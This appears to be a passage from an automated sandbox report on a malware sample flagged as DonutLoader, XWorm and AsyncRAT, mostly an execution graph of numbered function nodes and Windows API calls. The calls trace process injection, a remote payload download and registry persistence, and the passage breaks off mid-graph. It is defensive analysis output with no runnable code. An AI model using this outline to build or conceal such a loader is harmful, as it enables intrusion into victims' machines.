              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:55.5%
                Total number of Nodes:865
                Total number of Limit Nodes:6
                execution_graph 35054 2cdd08 35055 2cdd0d 35054->35055 35056 2ce173 35055->35056 35058 2cdd19 35055->35058 35094 299690 44 API calls 35056->35094 35072 2cdeef 35058->35072 35073 2ce1e0 35058->35073 35064 2cdec0 35065 2ce1e0 44 API calls 35064->35065 35067 2cded0 35065->35067 35067->35072 35086 2cdbb0 35067->35086 35068 2ce1e0 44 API calls 35071 2cde11 35068->35071 35071->35064 35071->35067 35071->35068 35093 2af250 memcmp 35071->35093 35072->35072 35074 2ce220 35073->35074 35084 2ce209 35073->35084 35077 2ce258 35074->35077 35078 2ce30a 35074->35078 35082 2ce4f8 35077->35082 35083 2ce401 35077->35083 35077->35084 35095 2af8e0 44 API calls 35077->35095 35096 2af7b0 44 API calls 35077->35096 35078->35082 35078->35083 35078->35084 35097 2af8e0 44 API calls 35078->35097 35098 2af7b0 44 API calls 35078->35098 35099 29a0a0 44 API calls 35082->35099 35083->35084 35100 29a0a0 44 API calls 35083->35100 35084->35071 35101 2cc3a0 35086->35101 35088 2cdbcc 35092 2cdc10 35088->35092 35118 2cc650 35088->35118 35090 2cdc03 35091 2cdc40 GetLastError 35090->35091 35090->35092 35091->35092 35092->35072 35093->35071 35095->35077 35096->35077 35097->35078 35098->35078 35102 2cc3cb 35101->35102 35110 2cc3f6 35101->35110 35103 2cc618 35102->35103 35104 2cc3d8 35102->35104 35155 298de0 44 API calls 35103->35155 35147 2cf490 35104->35147 35107 2cc61d 35156 298dc0 44 API calls 35107->35156 35112 2cc538 35110->35112 35153 2afbf0 44 API calls 35110->35153 35116 2cc5b1 35112->35116 35154 2ccbb0 44 API calls 35112->35154 35116->35088 35123 2cc679 35118->35123 35119 2cc808 SetLastError GetFullPathNameW 35121 2cc82a GetLastError 35119->35121 35119->35123 35122 2cc8c9 GetLastError 35121->35122 35121->35123 35144 2cc6c6 35122->35144 35123->35119 35124 2cc843 GetLastError 35123->35124 35125 2cc875 35123->35125 35123->35144 35157 2afbf0 44 API calls 35123->35157 35124->35123 35126 2ccb19 35124->35126 35128 2ccb33 35125->35128 35136 2cc87e 35125->35136 35161 29a560 44 API calls 35126->35161 35162 29a0a0 44 API calls 35128->35162 35131 2cc9a5 memcpy 35134 2cca6d memcpy 35131->35134 35135 2cca51 35131->35135 35140 2cca8d 35134->35140 35134->35144 35159 2afbf0 44 API calls 35135->35159 35136->35131 35158 2a0720 HeapAlloc 35136->35158 35160 2ccbb0 44 API calls 35140->35160 35141 2cca1a 35141->35131 35145 2ccb4a 35141->35145 35142 2cca62 35142->35134 35144->35090 35163 298dc0 44 API calls 35145->35163 35148 2cf4a5 HeapAlloc 35147->35148 35151 2cf4ab 35147->35151 35150 2ea4e8 35148->35150 35151->35148 35152 2cc3ed 35151->35152 35152->35107 35152->35110 35153->35110 35154->35116 35157->35123 35158->35141 35159->35142 35160->35144 35164 2914f0 35169 2d2d30 35164->35169 35166 291506 35173 291180 35166->35173 35168 29150b 35170 2d2d59 35169->35170 35171 2d2d70 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 35169->35171 35170->35166 35172 2d2dcb 35171->35172 35172->35166 35174 291460 GetStartupInfoA 35173->35174 35175 2911b4 35173->35175 35177 2913c8 35174->35177 35176 2911e1 Sleep 35175->35176 35178 2911f6 35175->35178 35176->35175 35177->35168 35179 291229 35178->35179 35180 29142c _initterm 35178->35180 35184 2913b4 35178->35184 35196 2d3370 35179->35196 35180->35179 35182 291251 SetUnhandledExceptionFilter 35216 2d3880 35182->35216 35184->35177 35185 2d2d30 5 API calls 35184->35185 35186 2914d6 35185->35186 35187 291180 129 API calls 35186->35187 35188 2914db 35187->35188 35188->35168 35189 29130e malloc 35190 29137b 35189->35190 35191 291335 35189->35191 35222 298820 35190->35222 35192 291340 strlen malloc memcpy 35191->35192 35192->35192 35193 291376 35192->35193 35193->35190 35194 29126d 35194->35189 35201 2d33a8 35196->35201 35203 2d3392 35196->35203 35197 2d35e0 35198 2d35da 35197->35198 35197->35203 35198->35197 35204 2d362c 35198->35204 35255 2d3160 8 API calls 35198->35255 35199 2d356e 35199->35204 35253 2d3160 8 API calls 35199->35253 35201->35197 35201->35199 35202 2d3648 35201->35202 35201->35203 35212 2d3450 35201->35212 35257 2d30f0 8 API calls 35202->35257 35203->35182 35256 2d30f0 8 API calls 35204->35256 35206 2d35a8 35254 2d3160 8 API calls 35206->35254 35209 2d3654 35209->35182 35211 2d3160 8 API calls 35211->35212 35212->35199 35212->35204 35212->35206 35212->35211 35213 2d3500 35212->35213 35214 2d34f6 35212->35214 35213->35203 35215 2d3532 VirtualProtect 35213->35215 35214->35213 35215->35213 35218 2d388f 35216->35218 35217 2d38bc 35217->35194 35218->35217 35258 2d3e20 strncmp 35218->35258 35220 2d38b7 35220->35217 35221 2d3965 RtlAddFunctionTable 35220->35221 35221->35217 35223 298836 35222->35223 35224 298859 SetThreadDescription 35223->35224 35259 2aafc0 35224->35259 35228 298899 35229 298933 35228->35229 35230 2988a2 35228->35230 35313 29b530 44 API calls 35229->35313 35231 29896c 35230->35231 35232 2988ac 35230->35232 35314 2ab230 44 API calls 35231->35314 35285 2ac560 35232->35285 35236 29896a 35316 2ab080 45 API calls 35236->35316 35237 2988c8 35238 2988d1 35237->35238 35239 2989aa 35237->35239 35309 2927fb 35238->35309 35315 29b6f0 44 API calls 35239->35315 35246 298927 35246->35184 35253->35206 35254->35198 35255->35198 35256->35202 35257->35209 35258->35220 35260 2cf490 HeapAlloc 35259->35260 35261 2aafe3 35260->35261 35262 2aafe8 35261->35262 35263 2ab040 35261->35263 35266 29887e 35262->35266 35317 2aceb0 44 API calls 35262->35317 35318 298e20 44 API calls 35263->35318 35265 2ab03e 35319 2d28b0 RtlCaptureContext RtlUnwindEx abort 35265->35319 35272 2ac630 35266->35272 35273 2ac64b TlsGetValue 35272->35273 35274 2ac6d0 35272->35274 35277 2ac65a 35273->35277 35278 2ac69d 35273->35278 35327 2ac7f0 44 API calls 35274->35327 35277->35278 35279 2cf490 HeapAlloc 35277->35279 35278->35228 35280 2ac66f 35279->35280 35281 2ac6e3 35280->35281 35282 2ac674 TlsGetValue TlsSetValue 35280->35282 35328 298e20 44 API calls 35281->35328 35282->35278 35284 2ac6f2 35286 2ac57e TlsGetValue 35285->35286 35287 2ac605 35285->35287 35290 2ac58d 35286->35290 35295 2ac5a9 35286->35295 35329 2ac7f0 44 API calls 35287->35329 35291 2cf490 HeapAlloc 35290->35291 35290->35295 35292 2ac5c2 35291->35292 35293 2ac618 35292->35293 35294 2ac5c7 TlsGetValue TlsSetValue 35292->35294 35330 298e20 44 API calls 35293->35330 35294->35295 35295->35237 35297 2ac627 35301 2ac64b TlsGetValue 35297->35301 35331 2ac7f0 44 API calls 35297->35331 35300 2ac65a 35302 2cf490 HeapAlloc 35300->35302 35307 2ac69d 35300->35307 35301->35300 35301->35307 35303 2ac66f 35302->35303 35304 2ac6e3 35303->35304 35305 2ac674 TlsGetValue TlsSetValue 35303->35305 35332 298e20 44 API calls 35304->35332 35305->35307 35307->35237 35308 2ac6f2 35333 294aa1 35309->35333 35310 292801 35310->35246 35312 2ab090 WaitOnAddress GetLastError WakeByAddressAll 35310->35312 35312->35246 35313->35236 35314->35239 35318->35265 35320 2d296b 35319->35320 35321 2d2975 35319->35321 35325 2d2850 RaiseException 35320->35325 35324 2d2970 abort 35321->35324 35326 2d24e0 RaiseException 35321->35326 35324->35321 35325->35324 35326->35321 35327->35273 35328->35284 35329->35286 35330->35297 35331->35301 35332->35308 35762 2a1956 35333->35762 35335 294abd 35336 294ba7 35335->35336 35337 294ac6 35335->35337 35949 29b530 44 API calls 35336->35949 35338 294bd0 35337->35338 35339 294ad2 35337->35339 35779 29499c 35338->35779 35942 2d2145 35339->35942 35344 29499c 45 API calls 35345 294c34 35344->35345 35784 293b76 35345->35784 35346 294af5 35351 294b7e 35346->35351 35947 2a18bc 44 API calls 35346->35947 35948 2934c8 45 API calls 35346->35948 35350 294c44 35352 29499c 45 API calls 35350->35352 35351->35310 35353 294c6f 35352->35353 35817 2948c3 35353->35817 35355 294c82 35356 29499c 45 API calls 35355->35356 35357 294cb5 35356->35357 35358 2948c3 45 API calls 35357->35358 35359 294cc8 35358->35359 35360 29499c 45 API calls 35359->35360 35361 294cf8 35360->35361 35362 2948c3 45 API calls 35361->35362 35363 294d0b 35362->35363 35364 29499c 45 API calls 35363->35364 35365 294d38 35364->35365 35366 2948c3 45 API calls 35365->35366 35367 294d4b 35366->35367 35368 29499c 45 API calls 35367->35368 35369 294d7b 35368->35369 35370 2948c3 45 API calls 35369->35370 35371 294d8e 35370->35371 35372 29499c 45 API calls 35371->35372 35373 294dbe 35372->35373 35374 2948c3 45 API calls 35373->35374 35375 294dd1 35374->35375 35376 29499c 45 API calls 35375->35376 35377 294dfc 35376->35377 35378 2948c3 45 API calls 35377->35378 35379 294e0f 35378->35379 35380 29499c 45 API calls 35379->35380 35381 294e3f 35380->35381 35382 2948c3 45 API calls 35381->35382 35383 294e52 35382->35383 35384 29499c 45 API calls 35383->35384 35385 294e7f 35384->35385 35386 2948c3 45 API calls 35385->35386 35387 294e92 35386->35387 35388 29499c 45 API calls 35387->35388 35389 294ebf 35388->35389 35390 2948c3 45 API calls 35389->35390 35391 294eda 35390->35391 35392 29499c 45 API calls 35391->35392 35393 294f02 LoadLibraryA 35392->35393 35394 294f16 35393->35394 35395 29499c 45 API calls 35394->35395 35396 294f33 LoadLibraryA 35395->35396 35397 294f47 35396->35397 35398 29499c 45 API calls 35397->35398 35399 294f64 35398->35399 35400 29499c 45 API calls 35399->35400 35401 294f9a 35400->35401 35402 293b76 52 API calls 35401->35402 35403 294faa 35402->35403 35404 29499c 45 API calls 35403->35404 35405 294fd5 35404->35405 35406 2948c3 45 API calls 35405->35406 35407 294fe8 35406->35407 35408 29499c 45 API calls 35407->35408 35409 295018 35408->35409 35410 2948c3 45 API calls 35409->35410 35411 29502b 35410->35411 35412 29499c 45 API calls 35411->35412 35413 29505b 35412->35413 35414 293b76 52 API calls 35413->35414 35415 29506b 35414->35415 35416 29499c 45 API calls 35415->35416 35417 295096 35416->35417 35418 2948c3 45 API calls 35417->35418 35419 2950a9 35418->35419 35420 29499c 45 API calls 35419->35420 35421 2950d9 35420->35421 35422 2948c3 45 API calls 35421->35422 35423 2950ec 35422->35423 35424 29499c 45 API calls 35423->35424 35425 29511c 35424->35425 35426 2948c3 45 API calls 35425->35426 35427 295131 35426->35427 35428 29499c 45 API calls 35427->35428 35429 29515d 35428->35429 35824 2cf130 35429->35824 35431 2951a8 35432 29499c 45 API calls 35431->35432 35433 295211 CreateProcessA 35432->35433 35434 29524e 35433->35434 35435 2981c7 35433->35435 35436 29499c 45 API calls 35434->35436 35437 29499c 45 API calls 35435->35437 35438 295285 35436->35438 35439 2981e9 35437->35439 35440 2cf130 48 API calls 35438->35440 35972 298765 44 API calls 35439->35972 35442 2952fb 35440->35442 35446 29499c 45 API calls 35442->35446 35443 2981f1 35444 29499c 45 API calls 35443->35444 35445 298206 35444->35445 35973 299650 44 API calls 35445->35973 35449 295325 35446->35449 35448 298275 35450 29499c 45 API calls 35448->35450 35451 2cf130 48 API calls 35449->35451 35452 298292 35450->35452 35453 295378 35451->35453 35974 298776 44 API calls 35452->35974 35456 29499c 45 API calls 35453->35456 35455 29829a 35457 29499c 45 API calls 35455->35457 35458 2953a2 35456->35458 35459 2982b7 35457->35459 35460 2cf130 48 API calls 35458->35460 35975 298787 44 API calls 35459->35975 35462 2953e1 35460->35462 35466 29499c 45 API calls 35462->35466 35463 2982bf 35464 29499c 45 API calls 35463->35464 35465 2982dc 35464->35465 35976 298798 44 API calls 35465->35976 35468 295413 VirtualAllocEx 35466->35468 35470 29499c 45 API calls 35468->35470 35469 2982e4 35471 29499c 45 API calls 35469->35471 35472 295458 35470->35472 35473 298301 35471->35473 35474 2cf130 48 API calls 35472->35474 35977 2987a9 44 API calls 35473->35977 35477 2954b7 35474->35477 35476 298309 35478 29499c 45 API calls 35476->35478 35480 2954cc WriteProcessMemory 35477->35480 35479 298326 35478->35479 35978 2987ba 44 API calls 35479->35978 35480->35443 35482 2954fd 35480->35482 35484 29499c 45 API calls 35482->35484 35483 29832e 35486 29499c 45 API calls 35483->35486 35485 29551a 35484->35485 35487 29499c 45 API calls 35485->35487 35488 29834b 35486->35488 35489 29552f 35487->35489 35979 2987cb 44 API calls 35488->35979 35491 2cf130 48 API calls 35489->35491 35492 2955ab 35491->35492 35494 29499c 45 API calls 35492->35494 35493 298353 35980 298dc0 44 API calls 35493->35980 35497 2955e2 35494->35497 35496 29840f 35981 29a0a0 44 API calls 35496->35981 35498 2948c3 45 API calls 35497->35498 35500 2955fc 35498->35500 35501 29499c 45 API calls 35500->35501 35502 295620 35501->35502 35503 2cf130 48 API calls 35502->35503 35504 29567b 35503->35504 35505 295690 CreateRemoteThread 35504->35505 35506 29499c 45 API calls 35505->35506 35507 2956df 35506->35507 35509 2cf130 48 API calls 35507->35509 35512 29572d 35509->35512 35513 29499c 45 API calls 35512->35513 35514 295763 35513->35514 35515 2cf130 48 API calls 35514->35515 35516 2957a4 35515->35516 35517 29499c 45 API calls 35516->35517 35518 2957cd 35517->35518 35519 29499c 45 API calls 35518->35519 35520 2957ea 35519->35520 35521 293b76 52 API calls 35520->35521 35522 2957fa 35521->35522 35523 29499c 45 API calls 35522->35523 35524 295825 35523->35524 35525 2948c3 45 API calls 35524->35525 35526 295838 35525->35526 35527 29499c 45 API calls 35526->35527 35528 295865 35527->35528 35529 2cf130 48 API calls 35528->35529 35530 2958b0 35529->35530 35531 2958c5 VirtualProtectEx 35530->35531 35531->35448 35532 295904 WriteProcessMemory 35531->35532 35532->35455 35533 295935 35532->35533 35534 29499c 45 API calls 35533->35534 35535 295952 35534->35535 35536 29499c 45 API calls 35535->35536 35537 295967 35536->35537 35538 2cf130 48 API calls 35537->35538 35539 2959e0 35538->35539 35540 295a0a VirtualProtectEx 35539->35540 35540->35463 35541 295a3a 35540->35541 35542 29499c 45 API calls 35541->35542 35543 295a4f 35542->35543 35544 2cf130 48 API calls 35543->35544 35545 295a90 35544->35545 35546 29499c 45 API calls 35545->35546 35547 295abf 35546->35547 35548 29499c 45 API calls 35547->35548 35549 295adc 35548->35549 35550 293b76 52 API calls 35549->35550 35551 295aec 35550->35551 35552 29499c 45 API calls 35551->35552 35553 295b17 35552->35553 35554 2948c3 45 API calls 35553->35554 35555 295b2a 35554->35555 35556 29499c 45 API calls 35555->35556 35557 295b4e 35556->35557 35558 2cf130 48 API calls 35557->35558 35559 295bb6 35558->35559 35560 295bcb VirtualProtectEx 35559->35560 35560->35469 35561 295c0c WriteProcessMemory 35560->35561 35561->35476 35562 295c3b 35561->35562 35563 29499c 45 API calls 35562->35563 35564 295c58 35563->35564 35565 29499c 45 API calls 35564->35565 35566 295c75 35565->35566 35567 2cf130 48 API calls 35566->35567 35568 295cee 35567->35568 35569 295d18 VirtualProtectEx 35568->35569 35569->35483 35570 295d3b 35569->35570 35571 29499c 45 API calls 35570->35571 35572 295d50 35571->35572 35573 2cf130 48 API calls 35572->35573 35574 295da2 35573->35574 35575 29499c 45 API calls 35574->35575 35576 295dcb 35575->35576 35577 2cf130 48 API calls 35576->35577 35578 295e06 35577->35578 35579 295e12 memset 35578->35579 35580 29499c 45 API calls 35579->35580 35581 295e64 35580->35581 35849 2932c8 35581->35849 35583 295e6f 35583->35493 35584 295e78 InternetOpenA 35583->35584 35585 29499c 45 API calls 35584->35585 35586 295ec2 35585->35586 35587 2932c8 44 API calls 35586->35587 35588 295ecd 35587->35588 35588->35493 35589 295ed6 InternetOpenUrlA 35588->35589 35590 295f14 InternetReadFile 35589->35590 35591 295f29 35590->35591 35595 295f50 35590->35595 35591->35590 35592 2980e6 35591->35592 35591->35595 35861 293444 35591->35861 35967 29a0a0 44 API calls 35592->35967 35595->35493 35866 2aa69c 35595->35866 35598 298069 35599 292dc4 HeapFree 35598->35599 35692 298088 35599->35692 35600 2967ae 35601 296854 35600->35601 35602 298521 35600->35602 35718 298036 35600->35718 35606 296939 35601->35606 35607 298454 35601->35607 35601->35692 35601->35718 35989 299700 44 API calls 35602->35989 35603 29665f 35603->35496 35603->35600 35603->35718 35950 2995ca 44 API calls 35603->35950 35610 296942 35606->35610 35638 2969a1 35606->35638 35982 29a0a0 44 API calls 35607->35982 35609 298468 35611 29499c 45 API calls 35609->35611 35615 29694f memset 35610->35615 35616 298596 35610->35616 35612 298485 35611->35612 35983 2987dc 44 API calls 35612->35983 35614 29848d 35617 29499c 45 API calls 35614->35617 35623 296979 35615->35623 35991 2d2116 44 API calls 35616->35991 35619 2984aa 35617->35619 35984 2987ed 44 API calls 35619->35984 35621 2984b2 35626 29499c 45 API calls 35621->35626 35622 2985f9 35993 2d2116 44 API calls 35622->35993 35624 296a0c memcpy 35623->35624 35951 293202 45 API calls 35624->35951 35629 2984cf 35626->35629 35628 298584 35990 299700 44 API calls 35628->35990 35985 2987fe 44 API calls 35629->35985 35630 296a43 35952 29dedc 44 API calls 35630->35952 35631 295fd2 35631->35493 35631->35496 35631->35603 35634 2995ca 44 API calls 35631->35634 35631->35692 35631->35718 35634->35631 35636 2984d7 35640 29499c 45 API calls 35636->35640 35637 296a53 memcpy 35953 29dedc 44 API calls 35637->35953 35638->35622 35639 298168 35638->35639 35642 29818c 35638->35642 35643 296c21 35638->35643 35968 299700 44 API calls 35639->35968 35645 2984f4 35640->35645 35969 299700 44 API calls 35642->35969 35644 2981b6 35643->35644 35652 2981a0 35643->35652 35654 296cfc 35643->35654 35971 299700 44 API calls 35644->35971 35986 29880f 44 API calls 35645->35986 35647 296a79 35954 29dedc 44 API calls 35647->35954 35970 299700 44 API calls 35652->35970 35655 296e12 memcpy 35654->35655 35956 293202 45 API calls 35655->35956 35656 2984fc 35987 29a0a0 44 API calls 35656->35987 35659 296e49 35957 29dedc 44 API calls 35659->35957 35660 296aa1 35955 29349c 44 API calls 35660->35955 35662 296e59 memcpy 35958 29dedc 44 API calls 35662->35958 35665 296e7f 35959 29dedc 44 API calls 35665->35959 35666 296ad8 memcpy 35668 296f7f memset 35666->35668 35672 296ffd 35668->35672 35669 296ea7 35960 29349c 44 API calls 35669->35960 35671 296ede memcpy 35671->35668 35672->35598 35673 2d2145 44 API calls 35672->35673 35674 2970b3 35672->35674 35673->35672 35870 292dc4 35674->35870 35676 297105 35677 29712a VirtualAllocEx 35676->35677 35676->35692 35677->35609 35678 29715e WriteProcessMemory 35677->35678 35678->35614 35680 2971b1 QueueUserAPC 35678->35680 35680->35621 35681 2971d1 ResumeThread 35680->35681 35681->35636 35682 2971f0 35681->35682 35683 29499c 45 API calls 35682->35683 35684 297205 35683->35684 35685 2cf130 48 API calls 35684->35685 35689 297282 35685->35689 35686 29733c SetLastError GetModuleFileNameW 35688 297356 GetLastError 35686->35688 35686->35689 35688->35689 35690 298111 GetLastError 35688->35690 35689->35686 35691 29736b GetLastError 35689->35691 35693 29739c 35689->35693 35961 2afbf0 44 API calls 35689->35961 35690->35692 35691->35689 35691->35692 35965 29b530 44 API calls 35692->35965 35966 29a560 44 API calls 35692->35966 35988 29b6d0 44 API calls 35692->35988 35693->35656 35694 2973a5 35693->35694 35874 2ae7a0 35694->35874 35696 2973b5 35696->35692 35890 2ccd20 35696->35890 35698 294aa1 74 API calls 35699 29756a 35698->35699 35923 2933ff 35699->35923 35701 2975d5 35703 294aa1 74 API calls 35701->35703 35702 297458 35702->35692 35702->35698 35704 29760b 35703->35704 35705 2933ff 44 API calls 35704->35705 35711 297671 35705->35711 35706 2978a8 35962 29d060 45 API calls 35706->35962 35708 29770a 35708->35628 35720 297795 35708->35720 35723 2976c4 35708->35723 35709 2978c3 35712 2978c8 35709->35712 35717 2978ff 35709->35717 35710 29499c 45 API calls 35713 297adb 35710->35713 35711->35628 35711->35706 35711->35708 35711->35723 35732 297f29 35711->35732 35963 292f1f 44 API calls 35712->35963 35714 2cf130 48 API calls 35713->35714 35715 297b45 35714->35715 35939 2cdc70 35715->35939 35719 297a03 35717->35719 35717->35723 35718->35692 35964 2931aa 44 API calls 35718->35964 35992 29c3a0 44 API calls 35719->35992 35720->35718 35720->35723 35723->35710 35723->35732 35724 297b6c 35725 297c19 35724->35725 35727 29499c 45 API calls 35724->35727 35726 2cc3a0 44 API calls 35725->35726 35728 297c43 35726->35728 35729 297b95 35727->35729 35731 2cc650 51 API calls 35728->35731 35747 29861d 35728->35747 35730 2cf130 48 API calls 35729->35730 35733 297bfc 35730->35733 35734 297c7f 35731->35734 35732->35310 35739 292d2e HeapFree 35733->35739 35737 2cc3a0 44 API calls 35734->35737 35734->35747 35735 29499c 45 API calls 35736 298682 35735->35736 35738 2cf130 48 API calls 35736->35738 35740 297ca5 35737->35740 35742 2986e0 35738->35742 35739->35725 35741 2cc650 51 API calls 35740->35741 35740->35747 35743 297cf0 35741->35743 35745 2d28b0 6 API calls 35742->35745 35744 297d13 CopyFileExW 35743->35744 35743->35747 35746 298627 GetLastError 35744->35746 35749 297d44 35744->35749 35748 29872e 35745->35748 35746->35747 35747->35735 35748->35310 35750 29499c 45 API calls 35749->35750 35751 297d94 RegCreateKeyExA 35750->35751 35752 297dd8 35751->35752 35753 2933ff 44 API calls 35752->35753 35754 297e30 35753->35754 35755 294aa1 74 API calls 35754->35755 35756 297e4d 35755->35756 35757 2933ff 44 API calls 35756->35757 35758 297e8b 35757->35758 35759 2933ff 44 API calls 35758->35759 35760 297edb 35759->35760 35760->35692 35761 297ef0 RegSetValueExA 35760->35761 35761->35732 35763 2a1ae8 35762->35763 35764 2a1973 TlsGetValue 35762->35764 36001 2ac7f0 44 API calls 35763->36001 35765 2a1989 35764->35765 35767 2a1acb 35764->35767 35765->35767 35768 2a1a9a 35765->35768 35994 2a3d17 35765->35994 35767->35335 36000 2a0e1a 44 API calls 35768->36000 35770 2a1af4 36002 299650 44 API calls 35770->36002 35772 2a19bb 35772->35770 35775 2a19c4 35772->35775 35774 2a1aa9 TlsGetValue TlsSetValue 35774->35767 35999 2a0e1a 44 API calls 35775->35999 35778 2a1a24 memset 35778->35768 35780 2d2145 44 API calls 35779->35780 35783 294a03 35780->35783 35781 294a7f 35781->35344 35783->35781 36004 2934c8 45 API calls 35783->36004 35793 293ca7 35784->35793 35785 294700 35786 2d2145 44 API calls 35785->35786 35787 29470a 35786->35787 35788 29499c 45 API calls 35787->35788 35791 29472c 35788->35791 35789 294848 36008 298de0 44 API calls 35789->36008 35795 2cf130 48 API calls 35791->35795 35792 2cf490 HeapAlloc 35792->35793 35793->35785 35793->35787 35793->35789 35793->35792 35796 29483b 35793->35796 35799 294788 35793->35799 35802 299530 44 API calls 35793->35802 35803 294823 35793->35803 35806 294435 memcpy 35793->35806 35808 29dc10 44 API calls 35793->35808 35810 2945eb memcpy 35793->35810 35813 298e40 44 API calls 35793->35813 35815 29410f 35793->35815 35816 29dd80 44 API calls 35793->35816 36005 2934c8 45 API calls 35793->36005 35795->35799 36007 298dc0 44 API calls 35796->36007 35799->35350 35802->35793 36006 299700 44 API calls 35803->36006 35806->35793 35808->35793 35810->35793 35813->35793 36009 29c3a0 44 API calls 35815->36009 35816->35793 35818 294900 strlen 35817->35818 35821 29491d 35818->35821 35819 294966 36010 29b530 44 API calls 35819->36010 35821->35818 35821->35819 35823 294947 35821->35823 35822 29499b 35823->35355 35825 2cf16c 35824->35825 35826 2cf2a9 35824->35826 36011 2ac110 35825->36011 36030 2ceaa0 WaitOnAddress GetLastError WakeByAddressAll 35826->36030 35829 2cf171 35830 2cf2ae 35829->35830 35831 2cf180 35829->35831 36031 2afc90 WaitOnAddress GetLastError 35830->36031 35838 2cf226 35831->35838 36023 29a740 35831->36023 35837 2cf1f4 36029 299650 44 API calls 35837->36029 36033 29b6f0 44 API calls 35838->36033 35839 2cf294 35843 2cf299 35839->35843 36032 299650 44 API calls 35839->36032 35842 2cf28b WakeByAddressSingle 35842->35839 35843->35431 35844 2cf22b 35844->35839 35844->35842 35852 2932f0 35849->35852 35850 293332 35851 2932f5 35850->35851 36162 298dc0 44 API calls 35850->36162 35851->35583 35852->35850 35852->35851 35857 2933b8 35852->35857 36160 298ee0 HeapAlloc 35852->36160 35855 293352 35855->35850 35855->35857 36161 298dc0 44 API calls 35857->36161 35862 293488 35861->35862 35863 293465 memcpy 35861->35863 35864 2d2145 44 API calls 35862->35864 35863->35591 35865 293496 35864->35865 35865->35863 35867 2aa6aa 35866->35867 35868 2aa6ba 35866->35868 35867->35868 36163 2aa5e4 HeapAlloc 35867->36163 35868->35631 35871 292dd8 35870->35871 35871->35676 35872 2d23e4 HeapFree 35871->35872 35873 2ea4f0 35872->35873 35875 2ae7c3 35874->35875 35880 2ae7ec 35874->35880 35876 2ae7c9 35875->35876 35877 2ae9b1 35875->35877 35879 2cf490 HeapAlloc 35876->35879 36166 298de0 44 API calls 35877->36166 35881 2ae7da 35879->35881 35882 2ae991 35880->35882 35888 2ae8a0 35880->35888 36165 2afa40 45 API calls 35880->36165 35881->35880 36164 298dc0 44 API calls 35881->36164 35882->35696 35888->35882 35889 2afa40 45 API calls 35888->35889 35889->35888 35891 2cc3a0 44 API calls 35890->35891 35894 2ccd51 35891->35894 35892 2cce88 SetLastError GetEnvironmentVariableW 35892->35894 35895 2ccea8 GetLastError 35892->35895 35894->35892 35897 2ccec1 GetLastError 35894->35897 35898 2ccef3 35894->35898 35905 2ccd5d 35894->35905 36167 2afbf0 44 API calls 35894->36167 35895->35894 35896 2ccf6f GetLastError 35895->35896 35896->35905 35897->35894 35899 2cd020 35897->35899 35900 2ccefc 35898->35900 35901 2cd03a 35898->35901 36168 29a560 44 API calls 35899->36168 35903 2ae7a0 45 API calls 35900->35903 36169 29a0a0 44 API calls 35901->36169 35903->35905 35905->35702 35929 29340d 35923->35929 35924 29341f 35925 29929d 35926 29a740 44 API calls 35925->35926 35927 2992c7 35926->35927 35928 2992cb 35927->35928 36171 29b530 44 API calls 35927->36171 35928->35701 35929->35924 35929->35925 35931 29930b 35929->35931 35933 2cf490 HeapAlloc 35929->35933 36172 298de0 44 API calls 35931->36172 35935 29928b 35933->35935 35935->35925 36170 298dc0 44 API calls 35935->36170 36173 2ae9e0 44 API calls 35939->36173 35941 2cdca3 35943 2d214e 35942->35943 35944 2d215d 35943->35944 36174 298dc0 44 API calls 35943->36174 35944->35346 35948->35346 35949->35338 35951->35630 35952->35637 35953->35647 35954->35660 35955->35666 35956->35659 35957->35662 35958->35665 35959->35669 35960->35671 35961->35689 35962->35709 35963->35723 35964->35598 35965->35692 35996 2a3d37 35994->35996 35995 2a3d92 35995->35772 35996->35995 36003 298e20 44 API calls 35996->36003 35998 2a3dbf 35998->35772 35999->35778 36000->35774 36001->35770 36003->35998 36004->35783 36005->35793 36010->35822 36012 2ac560 44 API calls 36011->36012 36013 2ac122 36012->36013 36015 2ac630 44 API calls 36013->36015 36019 2ac141 36013->36019 36022 2ac14c 36013->36022 36017 2ac134 36015->36017 36017->36019 36021 2ac147 36017->36021 36034 2ac700 44 API calls 36017->36034 36019->36021 36035 29b530 44 API calls 36019->36035 36021->36022 36036 29b6f0 44 API calls 36021->36036 36022->35829 36024 29a789 36023->36024 36025 29a88a 36023->36025 36026 29a90f 36024->36026 36027 2cefd0 44 API calls 36024->36027 36025->36024 36025->36026 36037 2cefd0 36025->36037 36026->35837 36026->35844 36027->36026 36030->35830 36031->35839 36034->36019 36035->36021 36040 2cec40 36037->36040 36039 2cefea 36039->36025 36041 2ceeed 36040->36041 36042 2cec60 36040->36042 36102 29ad10 44 API calls 36041->36102 36044 2ceef9 36042->36044 36046 2cec9f 36042->36046 36103 299690 44 API calls 36044->36103 36052 2cef0a 36046->36052 36053 2ced94 36046->36053 36065 2cecc4 36046->36065 36048 2cecd0 36050 2cecdd 36048->36050 36051 2cee09 36048->36051 36049 2cedd2 36099 299650 44 API calls 36049->36099 36056 2cee6c 36050->36056 36057 2cecec memcpy 36050->36057 36072 2ce930 36051->36072 36104 29a0a0 44 API calls 36052->36104 36063 2cee44 36053->36063 36053->36065 36100 2cef30 44 API calls 36056->36100 36061 2cee7a 36057->36061 36064 2cee3f 36061->36064 36081 2ac2e0 36061->36081 36070 2ac2e0 42 API calls 36063->36070 36071 2cee18 36063->36071 36064->36039 36065->36048 36065->36049 36067 2cee9f memcpy 36067->36064 36068 2ceeca 36101 2cef30 44 API calls 36068->36101 36070->36071 36071->36064 36071->36067 36071->36068 36073 2cea3e 36072->36073 36076 2ce94e 36072->36076 36073->36071 36075 2cea5d 36157 299690 44 API calls 36075->36157 36076->36073 36076->36075 36105 2ab6f0 36076->36105 36082 2ac45b 36081->36082 36084 2ac302 36081->36084 36082->36071 36083 2ab6f0 43 API calls 36083->36084 36084->36083 36085 2ac45f 36084->36085 36088 2ac437 36084->36088 36085->36082 36086 2ac4ae 36085->36086 36087 2ac477 36085->36087 36159 29a0a0 44 API calls 36086->36159 36087->36082 36089 